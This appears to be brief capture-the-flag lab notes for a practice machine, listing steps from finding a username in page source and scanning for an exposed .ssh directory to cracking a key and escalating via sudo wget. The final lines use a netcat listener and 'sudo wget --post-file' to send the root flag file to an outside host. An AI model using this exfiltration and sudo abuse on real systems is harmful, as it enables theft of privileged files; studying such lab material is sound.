export ip=10.10.102.35

in source there is a username : {Jessie don't forget to udate the webiste}


scan with gobuster {sitemap}  [.ssh]

crack the password with johntheripper

then login with ssh {ssh -i <file name> user@IP}

user flag will be on {Documents}

sudo -l

/usr/bin/wget

{https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/}


host {nc -lnvp 4445}

ssh {sudo /usr/bin/wget --post-file=/root/root_flag.txt http://$ip:4445}s
